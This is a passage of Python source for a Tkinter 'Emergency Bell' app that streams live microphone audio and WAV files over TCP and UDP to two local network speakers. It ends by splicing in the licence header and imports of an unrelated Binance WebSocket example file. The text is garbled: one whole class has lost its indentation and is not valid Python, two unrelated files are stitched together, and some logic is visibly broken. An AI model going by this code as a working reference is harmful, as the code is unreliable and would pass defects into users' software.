        self.b3.place(relx=.55, rely=0.6, anchor='w')
        Lh0.place(relx=0.50, rely=0.05, anchor='center')
        Lh1.place(relx=0.18, rely=0.40, anchor='w')
        self.Lh2.place(relx=0.58, rely=0.40, anchor='w')
        img_logo.place(relx=0.1, rely=0.18, anchor="w")
        img_logo2.place(relx=0.73, rely=0.17, anchor="w")
        img_logo3.place(relx=0.35, rely=0.18, anchor="w")
    def record_time(self,s):
        """Play button: connect to both speakers and start the live stream,
        then begin updating the elapsed-time display from *s* seconds."""
        ip1 = ip_input.get()
        port1 = port_input.get()
        ip2 = ip_input_1.get()
        port2 = port_input_1.get()
        self.client = Client_Send(ip=ip1, port=port1, ip2=ip2, port2=port2)
        self.client.running_all()
        live_run.set(True)
        self.record_time2(s)
    def record_time2(self, s):
        """Tick the elapsed-time label once a second via `after`."""
        timee = s
        if live_run.get():
            time_start = time.strftime('%H:%M:%S', time.gmtime(timee))
        else:
            # Stream is not running: keep showing zero.
            time_start = time.strftime('%H:%M:%S', time.gmtime(0))
        self.b2['state'] ="disabled"
        self.Lh2['text'] = time_start
        self._job = self.after(1000,self.record_time2, s+1)
    def stop_button(self):
        """Stop button: stop the live stream, reset the clock, re-enable Play."""
        # Guard: Stop can be clicked before Play has created the client.
        if self.client is not None:
            self.client.live.stop_playing()
        time_start = time.strftime('%H:%M:%S', time.gmtime(0))
        self.Lh2['text'] = time_start
        self.cancel_()
        self.b2['state'] ="normal"
    def cancel_(self):
        """Cancel the pending elapsed-time `after` callback, if any."""
        if self._job is not None:
            self.after_cancel(self._job)
            self._job = None
    def backOpt(self):
        """Back button: close this window and re-show the parent page."""
        self.destroy()
        self.master2.show()
# Connection-status page
class PageFive(tk.Toplevel):
    """Connection-status window.

    Probes the configured speaker address(es) on two daemon threads while
    an animated "Connecting..." label runs on the Tk `after` loop; once the
    relevant speaker(s) connect (per the bool1/bool2/bool3 mode flags) it
    hides itself and re-shows the parent, or reports failure.
    """
    def __init__(self, master):
        """Build the window; *master* is the parent page re-shown afterwards."""
        self.master2 = master
        tk.Toplevel.__init__(self)
        self.geometry("500x500")
        self.title("Emergency Bell")
        #self.state("zoomed")
        self.frame = tk.Frame(self)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="white")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background="orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        self.b1 = tk.Button(self.frame1, text='Home', command=self.exit_, fg='black',
                            bg='white', relief='solid', width=6, height=1,
                            font=('arial', 10, 'bold'))
        Lh0 = tk.Label(self.frame1, text='Wi-Fi Sender', font=('arial', 20, 'bold'), bg='orange')
        self.Lh1 = tk.Label(self.frame1, text='', font=('arial', 14, 'bold'), bg='orange', fg='maroon')
        self.Lh2 = tk.Label(self.frame1, text='IP Address 1: 192.168.254.115', textvariable=_conn1, font=('arial', 12, 'bold'), bg='orange')
        self.Lh3 = tk.Label(self.frame1, text='Port Address 1: 8080', textvariable=_conn2,font=('arial', 12, 'bold'), bg='orange')
        self.Lh4 = tk.Label(self.frame1, text='IP Address 2: 192.168.254.115', textvariable=_conn3, font=('arial', 12, 'bold'), bg='orange')
        self.Lh5 = tk.Label(self.frame1, text='Port Address 2: 8080', textvariable=_conn4,font=('arial', 12, 'bold'), bg='orange')
        self.Lh6 = tk.Label(self.frame1, text='Status:', font=('arial', 12, 'bold'), bg='orange')
        self.Lh7 = tk.Label(self.frame1, text='Speaker 1: Connecting' , font=('arial', 12, 'bold'), bg='orange',)
        self.Lh8 = tk.Label(self.frame1, text='Speaker 2: Connecting', font=('arial', 12, 'bold'), bg='orange')
        path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
        load_img = Image.open(path1)
        wd1 = 80
        ht1 = 80
        img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
        get_img = ImageTk.PhotoImage(img_res1)
        img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
        # Keep a reference so the PhotoImage is not GC'd.
        img_logo.image = get_img
        self.b1.place(x=0, y=0)
        Lh0.place(relx=0.50, rely=0.05, anchor='center')
        self.Lh1.place(relx=0.38, rely=0.32, anchor='w')
        self.Lh2.place(relx=0.3, rely=0.44, anchor='w')
        self.Lh3.place(relx=0.3, rely=0.49, anchor='w')
        self.Lh4.place(relx=0.3, rely=0.59, anchor='w')
        self.Lh5.place(relx=0.3, rely=0.64, anchor='w')
        self.Lh6.place(relx=0.3, rely=0.75, anchor='w')
        self.Lh7.place(relx=0.36, rely=0.80, anchor='w')
        self.Lh8.place(relx=0.36, rely=0.85, anchor='w')
        img_logo.place(relx=0.5, rely=0.10, anchor="n")
        # Per-speaker connection state, polled by text_connect_().
        self.not_yet_connect = True
        self.not_yet_connect_2 = True
        self.unsuccessful = False
        self.unsuccessful_2 = False
        self.connected_ = False
        self.connected_2 = False
        self.stop_1 = False
        self.text_connect_('.')
        ip1 = ip_input.get()
        po1 = port_input.get()
        ip2 = ip_input_1.get()
        po2 = port_input_1.get()
        self.address_1 =(ip1, po1)
        self.address_2 =(ip2, po2)
        t1 = threading.Thread(target=self.connect_1, daemon=True)
        t2 = threading.Thread(target=self.connect_2, daemon=True)
        t1.start()
        t2.start()
        # Home stays disabled until the probe succeeds or fails.
        self.b1['state'] ='disabled'
    def text_connect_(self, s):
        """Animate "Connecting . . ." and, at the end of each cycle, act on
        the probe results according to the bool1/bool2/bool3 mode flags."""
        txt = "Connecting"+s
        if len(txt)<20:
            self.Lh1['text'] = txt
            self._job_1 = self.frame.after(1000, self.text_connect_, s+' .')
        else:
            if self._job_1 is not None:
                self.frame.after_cancel(self._job_1)
                self._job_1 = None
            if self.not_yet_connect and self.not_yet_connect_2:
                # Neither probe has finished (failed) yet: keep animating.
                self.text_connect_('.')
            else:
                if self.unsuccessful and self.unsuccessful_2:
                    self.Lh1['text'] = 'Connection Failed'
                    self.b1['state'] ='normal'
                else:
                    # bool1/bool2/bool3: speaker-1-only / speaker-2-only / both.
                    if bool1.get() == True:
                        if self.connected_:
                            self.cancel_d_job()
                            self.backOpt()
                            self.connected_ = False
                    elif bool2.get() == True:
                        if self.connected_2:
                            self.cancel_d_job()
                            self.backOpt()
                            self.connected_2 = False
                    elif bool3.get() == True:
                        if (self.connected_ and self.connected_2):
                            self.cancel_d_job()
                            self.backOpt()
                            self.connected_ = False
                            self.connected_2 = False
                    self.text_connect_('.')
    def cancel_d_job(self):
        """Cancel the pending animation `after` callback, if any."""
        if self._job_1 is not None:
            self.frame.after_cancel(self._job_1)
            self._job_1 = None
    def exit_(self):
        """Home button: destroy this window and re-show the parent."""
        self.destroy()
        self.master2.show()
    def backOpt(self):
        """Hide this window and re-show the parent (connection succeeded)."""
        self.withdraw()
        self.master2.show()
    def connect_1(self):
        """Probe speaker 1 with a throwaway TCP connect (daemon thread).

        NOTE(review): the probe socket is never closed on success -- it is
        left to GC; confirm whether the server relies on it staying open.
        """
        socket1= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            print("Connecting at",self.address_1 )
            socket1.connect(self.address_1)
            print("Connected!" )
        except Exception as e:
            print(e)
            self.connect_unsucessful_1()
            self.not_yet_connect = False
            self.unsuccessful =True
        else: self.connected_ = True
    def connect_2(self):
        """Probe speaker 2 with a throwaway TCP connect (daemon thread)."""
        socket1= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            print("Connecting at",self.address_2 )
            socket1.connect(self.address_2)
            print("Connected!" )
        except Exception as e:
            print(e)
            self.connect_unsucessful_2()
            self.not_yet_connect_2 = False
            self.unsuccessful_2 =True
        else: self.connected_2 = True
    def connect_unsucessful_1(self):
        """Show the speaker-1 failure status."""
        t1 = 'Speaker 1: Connection Failed'
        self.Lh7['text'] = t1
    def connect_unsucessful_2(self):
        """Show the speaker-2 failure status."""
        t1 = 'Speaker 2: Connection Failed'
        self.Lh8['text'] = t1
# Selector used by Client_Send to multiplex its handshake sockets.
# NOTE(review): module-level and therefore shared across Client_Send
# instances -- concurrent instances would interfere; confirm single use.
mysel = selectors.DefaultSelector()
class Client_Send(object):
def __init__(self, ip=None, port=None, ip2=None, port2=None):
super(Client_Send, self).__init__()
self.success_connect_1 = True
self.success_connect_2 = True
if ip != None and port != None:
self.ip = ip
self.port = int(port)+1
self.server_address = (self.ip, self.port)
else:
self.server_address = None
if ip2 != None and port2 != None:
self.ip2 = ip2
self.port2 = int(port2)+1
self.server_address_2 = (self.ip2, self.port2)
else:
self.server_address_2 = None
self.keep_running = True
json_ser1 = json.dumps(self.server_address)
json_ser2 = json.dumps(self.server_address_2)
self.live = Live_Client(json_ser1, json_ser2)
def running_all(self):
thread_1 = threading.Thread(target=self.server1_operate, daemon=True)
thread_2 = threading.Thread(target=self.server2_operate, daemon=True)
thread_1.start()
thread_2.start()
# self.server1_operate()
# self.server2_operate()
# self.server3_operate()
def server1_operate(self):
print('connecting to {} port {}'.format(*self.server_address))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(self.server_address)
except Exception as e:
print(f'error--1: {e}')
self.success_connect_1 = False
live_run.set(False)
else:
self.success_connect_1 = True
print("Successfully connect to 1")
if self.success_connect_1:
sock.setblocking(False)
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, data=None)
# =========>
# =========//////////
self.main_operation()
def server2_operate(self):
print('connecting to {} port {}'.format(*self.server_address_2))
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock2.connect(self.server_address_2)
except Exception as e:
print(f'error--2: {e}')
self.success_connect_2 = False
else:
self.success_connect_2 = True
if self.success_connect_2:
sock2.setblocking(False)
print("Successfully connect to 2")
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, data=self.service_bluff)
# =========>
# =========//////////
self.main_operation_bluff()
def main_operation(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
connection = key.fileobj
self.client_address = connection.getpeername()
print('client({})'.format(self.client_address))
if mask & selectors.EVENT_WRITE:
self.service_operate(connection)
def main_operation_bluff(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
callback = key.data
callback(key.fileobj, mask)
def service_bluff(self, key, mask):
sock = key
if mask & selectors.EVENT_WRITE:
self.service_operate_bluff(sock)
# print('shutting down')
# mysel.unregister(connection)
# connection.close()
# mysel.close()
def service_operate(self, conn):
    """Send the fixed handshake packet, then start the live audio stream."""
    data = b'logarithmic'
    # >ii11s: two big-endian int32 magic values followed by the 11-byte tag.
    pack_data = struct.pack(">ii11s", 32, 2319, data)
    conn.sendall(pack_data)
    # pack_data is always non-empty, so this branch always runs after sendall.
    if pack_data:
        self.live.running_live()
        mysel.unregister(conn)
        conn.close()
def service_operate_bluff(self, conn):
    """Send the fixed handshake packet on the secondary link, then close it."""
    payload = struct.pack(">ii11s", 32, 2319, b'logarithmic')
    conn.sendall(payload)
    # payload is never empty, so cleanup always follows the send
    if payload:
        print("done123")
        mysel.unregister(conn)
        conn.close()
class Live_Client(object):
    """Captures microphone audio with PyAudio and streams the raw frames over
    UDP to two peers at once (each peer's UDP port is its advertised port + 1).
    """

    def __init__(self, ip, ip2):
        super(Live_Client, self).__init__()
        # Each argument is a JSON-encoded [host, port] pair.
        ip_1 = ip
        ip_2 = ip2
        ip_1 = json.loads(ip_1)
        ip_2 = json.loads(ip_2)
        # self.ip = ip
        # self.port = port
        _ip1 = ip_1[0]
        _port1 = ip_1[1]+1
        _ip2 = ip_2[0]
        _port2 = ip_2[1]+1
        ip_3 = (_ip1, _port1)
        ip_4 = (_ip2, _port2)
        self.frames = []        # FIFO of captured chunks (producer: record)
        self.addresses = ip_3       # UDP target 1
        self.addresses_2 = ip_4     # UDP target 2
        self.pausing = False        # set True by stop_playing() to end both threads
        FORMAT = pyaudio.paInt16
        CHUNK = 1024
        self.chunk = CHUNK
        CHANNELS = 2
        RATE = 44100
        self.Audio = pyaudio.PyAudio()
        # Open the default input device: 16-bit stereo at 44.1 kHz.
        self.stream = self.Audio.open(format=FORMAT,
                                      channels=CHANNELS,
                                      rate=RATE,
                                      input=True,
                                      frames_per_buffer=CHUNK,
                                      )

    def running_live(self):
        """Start the capture and UDP-send daemon threads."""
        self.AudioThread = threading.Thread(target=self.record, daemon=True)
        self.udpThread = threading.Thread(target=self.udpStream, daemon=True)
        self.AudioThread.start()
        self.udpThread.start()

    def udpStream(self):
        """Consumer loop: pop captured frames and send each one to both targets."""
        print("connecting live at ", self.addresses)
        print("were live now!")
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.z1 = udp
        # NOTE(review): the outer loop only re-checks pausing after the inner
        # loop breaks, so the two nested identical loops are redundant.
        while True:
            if self.pausing:
                break
            while True:
                if self.pausing:
                    break
                if len(self.frames) > 0:
                    frames_mod = self.frames.pop(0)
                    try:
                        self.z1.sendto(frames_mod, self.addresses)
                    except Exception as e:
                        #print(e)
                        pass  # best-effort: drop the packet for target 1
                    try:
                        self.z1.sendto(frames_mod, self.addresses_2)
                    except Exception as e:
                        pass  # best-effort: drop the packet for target 2
        print("closing socket")
        udp.close()

    def record(self):
        """Producer loop: read mic chunks into self.frames until paused."""
        while True:
            if self.pausing:
                break
            self.frames.append(self.stream.read(self.chunk))
        print("closing recording")
        self.stream.stop_stream()
        self.stream.close()
        self.Audio.terminate()

    def stop_playing(self):
        # Signals both daemon loops to exit on their next iteration.
        self.pausing = True
        print("pausing")

    def resume_playing(self):
        # NOTE(review): clears the flag only; the threads have already exited,
        # so a caller must invoke running_live() again to actually resume.
        self.pausing = False
class Client2_Send(object):
    """Handshakes with up to two servers over TCP (advertised port + 1), then
    pushes the WAV file named in ``name.txt`` to each peer via Client_wave.
    """

    def __init__(self, ip=None, port=None, ip2=None, port2=None):
        super(Client2_Send, self).__init__()
        self.success_connect_1 = True
        self.success_connect_2 = True
        self.keep_running = True
        if ip is not None and port is not None:
            self.ip = ip
            self.port = int(port)+1  # data channel is advertised port + 1
            self.server_address = (self.ip, self.port)
        else:
            self.server_address = None
        if ip2 is not None and port2 is not None:
            self.ip2 = ip2
            self.port2 = int(port2)+1
            self.server_address_2 = (self.ip2, self.port2)
        else:
            self.server_address_2 = None
        self.waveclient = Client_wave()

    def running_all(self):
        """Read the WAV path from name.txt and contact both servers in parallel."""
        # NOTE(review): the file handle is never closed.
        file = open('name.txt', 'r+')
        source = file.read()
        self.source = source
        t1 = threading.Thread(target=self.server1_operate, daemon=True)
        t2 = threading.Thread(target=self.server2_operate, daemon=True)
        t1.start()
        t2.start()
        t1.join()
        t2.join()

    def server1_operate(self):
        """Connect to the primary server and register it with the selector."""
        print('connecting to {} port {}'.format(*self.server_address))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect(self.server_address)
        except Exception as e:
            print(f'error--1: {e}')
            self.success_connect_1 = False
        else:
            self.success_connect_1 = True
            print("Successfully connect to 1")
        if self.success_connect_1:
            sock.setblocking(False)
            # Set up the selector to watch for when the socket is ready
            # to send data as well as when there is data to read.
            mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, )
            # =========>
            # =========//////////
            self.main_operation()

    def server2_operate(self):
        """Connect to the secondary server and register it with the selector."""
        try:
            # server_address_2 may be None when only one peer was configured.
            print('connecting to {} port {}'.format(*self.server_address_2))
        except TypeError as e:
            pass
        sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock2.connect(self.server_address_2)
        except Exception as e:
            print(f'error--2: {e}')
            self.success_connect_2 = False
        else:
            self.success_connect_2 = True
        if self.success_connect_2:
            sock2.setblocking(False)
            print("Successfully connect to 2")
            # Set up the selector to watch for when the socket is ready
            # to send data as well as when there is data to read.
            mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, )
            # =========>
            # =========//////////
            self.main_operation()

    def main_operation(self):
        """Poll the shared selector once; writable sockets go to service_operate()."""
        if self.keep_running:
            print('waiting for I/O')
            for key, mask in mysel.select(timeout=1):
                connection = key.fileobj
                self.client_address = connection.getpeername()
                print('client({})'.format(self.client_address))
                if mask & selectors.EVENT_WRITE:
                    self.service_operate(connection)

    def service_operate(self, conn):
        """Send the handshake packet, then stream the WAV file to the peer."""
        data = b"xboxlive2020operate"
        # >i19si: int32 magic, 19-byte tag, int32 magic.
        pack_data = struct.pack(">i19si", 4020, data, 202304)
        conn.sendall(pack_data)
        # pack_data is always non-empty, so cleanup always follows the send.
        if pack_data:
            address_1 = conn.getpeername()
            ip_add = address_1[0]
            port_add = address_1[1]
            source = self.source
            print("sending data")
            self.waveclient.operator_wav(ip_add,port_add, source)
            #w.operator_wav()
            mysel.unregister(conn)
            conn.close()
class Client_wave(object):
    """Streams a WAV file to one peer: format metadata over TCP (port+1), then
    the raw frames over UDP (port+2), driving the module-level tk progress
    variables (``progress_var``, ``percentage_``, ``root``) as it goes.
    """

    def __init__(self):
        super(Client_wave, self).__init__()
        self.resume_play()  # initialises done__/resume1
        self.done = False
        # if port is not None:
        #     self.port = int(port)
        self.frames = []
        #self.source = "waves.wav" #####GENEL ari alisdi ang file pag send
        #self.destination = "_sample_wav.wav"
        self.chunks = 1000   # WAV frames per UDP datagram
        self.t = 0.00125     # inter-packet delay in seconds
        self.Audio = pyaudio.PyAudio()
        self.connected_ = False  # outcome of the metadata handshake
        self.stop1 = False       # stop_play() flag
        self.pause2 = False      # pause_play() flag
        self.resume1 = False     # resume_play() flag
        self.done__ = False      # True once streaming finished or was stopped

    def operator_wav(self,ip, port, source):
        """Handshake with ip:(port+1), then stream *source* to ip:(port+2)."""
        self.ip = ip
        self.port = port+1
        self.port_1 = port+2
        self.server_address = (self.ip, self.port)      # TCP metadata channel
        self.server_address_1 = (self.ip, self.port_1)  # UDP audio channel
        self.source = source
        wf = wave.open(self.source, 'rb')
        sample_width = wf.getsampwidth()
        print(f"Sample width: {sample_width}")
        sample_rate = wf.getframerate()
        print(f"Sample rate: {sample_rate}")
        channels = wf.getnchannels()
        print(f"Channels: {channels}")
        pyaudio_format = self.Audio.get_format_from_width(sample_width)
        print(f"Format: {pyaudio_format}")
        self.send_info(pyaudio_format, sample_rate, channels)
        print("the connect is :", self.connected_)
        if self.connected_:
            nu_frames = wf.getnframes()
            print(f"No. of frames : {nu_frames}")
            wf.close()
            self.processing_init()
            print("Done sending wav")

    def processing_init(self):
        # Initialize Threads
        udpThread = threading.Thread(target=self.udpStream, daemon=True)
        udpThread.start()
        udpThread.join()  # effectively synchronous: waits for the stream to end

    def udpStream(self):
        """Send the WAV frames as fixed-size UDP packets, updating the progress bar."""
        self.stop1 = False
        wf = wave.open(self.source, 'rb')
        size = wf.getnframes()
        num_packets = int((size/self.chunks)+1)
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for i in range(num_packets):
            if self.stop1:
                break
            if self.pause2:
                # NOTE(review): busy-waits until resume_play() sets resume1;
                # the `continue` then skips this iteration's packet entirely.
                while True:
                    if self.resume1:
                        self.pause2 = False
                        self.resume1 = False
                        break
                continue
            udp.sendto(wf.readframes(self.chunks), self.server_address_1)
            # progress_var / percentage_ / root are module-level tk objects.
            progress_var.set(i)
            val = str(int((i/num_packets)*100))
            percentage_.set(val + "%")
            root.update()
            time.sleep(self.t)
        self.done__ = True
        print("closing socket")
        udp.close()

    def send_info(self, format_py, sample_rate, channels):
        """Send (format, sample_rate, channels) as three big-endian int32 over TCP."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        print("Connecting to {}".format(self.server_address))
        try:
            sock.connect(self.server_address)
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt.
            print("Can't connect target machine refuse.")
            self.connected_ = False
        else:
            self.connected_ = True
        if self.connected_:
            file_info = struct.pack(">iii", format_py, sample_rate, channels)
            sock.send(file_info)
            print("format is send!")
        sock.close()

    def stop_play(self):
        # Abort streaming on the next loop iteration.
        self.stop1 = True
        self.done__ = True

    def resume_play(self):
        self.done__ = False
        self.resume1 = True

    def pause_play(self):
        self.pause2 = True
        self.done__ = True
class Client3_Send(object):
    """Handshakes with up to two servers over TCP (advertised port + 1), then
    pushes the sound file selected by *name* to each peer via Client_hourbell.
    """

    def __init__(self, ip=None, port=None, ip2=None, port2=None):
        super(Client3_Send, self).__init__()
        self.success_connect_1 = True
        self.success_connect_2 = True
        self.keep_running = True
        if ip is not None and port is not None:
            self.ip = ip
            self.port = int(port)+1  # data channel is advertised port + 1
            self.server_address = (self.ip, self.port)
        else:
            self.server_address = None
        if ip2 is not None and port2 is not None:
            self.ip2 = ip2
            self.port2 = int(port2)+1
            self.server_address_2 = (self.ip2, self.port2)
        else:
            self.server_address_2 = None
        self.hourbell = Client_hourbell()

    def running_all(self, name):
        """Resolve *name* to a sound-file path, then contact both servers."""
        if os.path.exists('sound.txt'):
            # NOTE(review): the file handle is overwritten by its own read()
            # result and therefore never closed.
            w = open('sound.txt', 'r+')
            w = w.read()
            source = json.loads(w)
        else:
            # item_source is a module-level tk.StringVar; ``{**t1}`` requires a
            # mapping, so this branch raises TypeError if get() returns a str.
            # TODO(review): confirm the intended type of item_source.
            t1 = item_source.get()
            source = {**t1}
        source = source[name]
        self.source = source
        t1 = threading.Thread(target=self.server1_operate, daemon=True)
        t2 = threading.Thread(target=self.server2_operate, daemon=True)
        t1.start()
        t2.start()
        t1.join()
        t2.join()

    def server1_operate(self):
        """Connect to the primary server and register it with the selector."""
        print('connecting to {} port {}'.format(*self.server_address))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect(self.server_address)
        except Exception as e:
            print(f'error--1: {e}')
            self.success_connect_1 = False
        else:
            self.success_connect_1 = True
            print("Successfully connect to 1")
        if self.success_connect_1:
            sock.setblocking(False)
            # Set up the selector to watch for when the socket is ready
            # to send data as well as when there is data to read.
            mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, )
            # =========>
            # =========//////////
            self.main_operation()

    def server2_operate(self):
        """Connect to the secondary server and register it with the selector."""
        try:
            # server_address_2 may be None when only one peer was configured.
            print('connecting to {} port {}'.format(*self.server_address_2))
        except TypeError as e:
            pass
        sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock2.connect(self.server_address_2)
        except Exception as e:
            print(f'error--2: {e}')
            self.success_connect_2 = False
        else:
            self.success_connect_2 = True
        if self.success_connect_2:
            sock2.setblocking(False)
            print("Successfully connect to 2")
            # Set up the selector to watch for when the socket is ready
            # to send data as well as when there is data to read.
            mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, )
            # =========>
            # =========//////////
            self.main_operation()

    def main_operation(self):
        """Poll the shared selector once; writable sockets go to service_operate()."""
        if self.keep_running:
            print('waiting for I/O')
            for key, mask in mysel.select(timeout=1):
                connection = key.fileobj
                self.client_address = connection.getpeername()
                print('client({})'.format(self.client_address))
                if mask & selectors.EVENT_WRITE:
                    self.service_operate(connection)

    def service_operate(self, conn):
        """Send the handshake packet, then stream the sound file to the peer."""
        data = b"l01ik20apBjok0q3k2oCo3k3Piz3i"
        # >29sii: 29-byte tag followed by two big-endian int32 magic values.
        pack_data = struct.pack(">29sii", data, 10390, 209340)
        conn.sendall(pack_data)
        # pack_data is always non-empty, so cleanup always follows the send.
        if pack_data:
            address_1 = conn.getpeername()
            ip_add = address_1[0]
            port_add = address_1[1]
            source = self.source
            print("sending data")
            self.hourbell.operator_wav(ip_add,port_add, source)
            #w.operator_wav()
            mysel.unregister(conn)
            conn.close()
class Client_hourbell(object):
    """Streams a WAV file to one peer; duplicates the streaming logic of
    Client_wave (TCP metadata handshake on port+1, UDP frames on port+2).
    """

    def __init__(self):
        super(Client_hourbell, self).__init__()
        self.resume_play()  # initialises done__/resume1
        self.done = False
        self.frames = []
        self.chunks = 1000   # WAV frames per UDP datagram
        self.t = 0.00125     # inter-packet delay in seconds
        self.Audio = pyaudio.PyAudio()
        self.connected_ = False  # outcome of the metadata handshake
        self.stop1 = False       # stop_play() flag
        self.pause2 = False      # pause_play() flag
        self.resume1 = False     # resume_play() flag
        self.done__ = False      # True once streaming finished or was stopped

    def operator_wav(self,ip, port, source):
        """Handshake with ip:(port+1), then stream *source* to ip:(port+2)."""
        self.ip = ip
        self.port = port+1
        self.port_1 = port+2
        self.server_address = (self.ip, self.port)      # TCP metadata channel
        self.server_address_1 = (self.ip, self.port_1)  # UDP audio channel
        self.source = source
        wf = wave.open(self.source, 'rb')
        sample_width = wf.getsampwidth()
        print(f"Sample width: {sample_width}")
        sample_rate = wf.getframerate()
        print(f"Sample rate: {sample_rate}")
        channels = wf.getnchannels()
        print(f"Channels: {channels}")
        pyaudio_format = self.Audio.get_format_from_width(sample_width)
        print(f"Format: {pyaudio_format}")
        self.send_info(pyaudio_format, sample_rate, channels)
        print("the connect is :", self.connected_)
        if self.connected_:
            nu_frames = wf.getnframes()
            print(f"No. of frames : {nu_frames}")
            wf.close()
            self.processing_init()
            print("Done sending wav")

    def processing_init(self):
        # Initialize Threads
        udpThread = threading.Thread(target=self.udpStream, daemon=True)
        udpThread.start()
        udpThread.join()  # effectively synchronous: waits for the stream to end

    def udpStream(self):
        """Send the WAV frames as fixed-size UDP packets, updating the progress bar."""
        self.stop1 = False
        wf = wave.open(self.source, 'rb')
        size = wf.getnframes()
        num_packets = int((size/self.chunks)+1)
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for i in range(num_packets):
            if self.stop1:
                break
            if self.pause2:
                # NOTE(review): busy-waits until resume_play() sets resume1;
                # the `continue` then skips this iteration's packet entirely.
                while True:
                    if self.resume1:
                        self.pause2 = False
                        self.resume1 = False
                        break
                continue
            udp.sendto(wf.readframes(self.chunks), self.server_address_1)
            # progress_var / percentage_ / root are module-level tk objects.
            progress_var.set(i)
            val = str(int((i/num_packets)*100))
            percentage_.set(val + "%")
            root.update()
            time.sleep(self.t)
        self.done__ = True
        print("closing socket")
        udp.close()

    def send_info(self, format_py, sample_rate, channels):
        """Send (format, sample_rate, channels) as three big-endian int32 over TCP."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        print("Connecting to {}".format(self.server_address))
        try:
            sock.connect(self.server_address)
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt.
            print("Can't connect target machine refuse.")
            self.connected_ = False
        else:
            self.connected_ = True
        if self.connected_:
            file_info = struct.pack(">iii", format_py, sample_rate, channels)
            sock.send(file_info)
            print("format is send!")
        sock.close()

    def stop_play(self):
        # Abort streaming on the next loop iteration.
        self.stop1 = True
        self.done__ = True

    def resume_play(self):
        self.done__ = False
        self.resume1 = True

    def pause_play(self):
        self.pause2 = True
        self.done__ = True
def center_window(app, w=300, h=200):
    """Resize *app* to w x h and center it on the screen."""
    screen_w = app.winfo_screenwidth()
    screen_h = app.winfo_screenheight()
    # top-left corner that centers a w x h window
    x = (screen_w - w) / 2
    y = (screen_h - h) / 2
    app.geometry('%dx%d+%d+%d' % (w, h, x, y))
if __name__ == '__main__':
    root = tk.Tk()
    # Connection form inputs: two host/port pairs.
    ip_input = tk.StringVar(root)
    ip_input_1 = tk.StringVar(root)
    port_input = tk.IntVar(root)
    port_input_1 = tk.IntVar(root)
    # Toggle states read elsewhere in the UI.
    bool1 = tk.BooleanVar(root)
    bool2 = tk.BooleanVar(root)
    bool3 = tk.BooleanVar(root)
    live_run = tk.BooleanVar(root)  # cleared when the live connection fails
    #------
    # Connection-status display strings.
    _conn1 = tk.StringVar(root)
    _conn2 = tk.StringVar(root)
    _conn3 = tk.StringVar(root)
    _conn4 = tk.StringVar(root)
    progress_var = tk.DoubleVar(root)  # transfer progress bar value
    percentage_ = tk.StringVar(root)   # transfer progress percentage text
    item_source = tk.StringVar(root)
    # MainWindow is defined earlier in this file (outside this chunk).
    app = MainWindow(root)
    root.mainloop()
|
example_binance_futures.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_futures.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
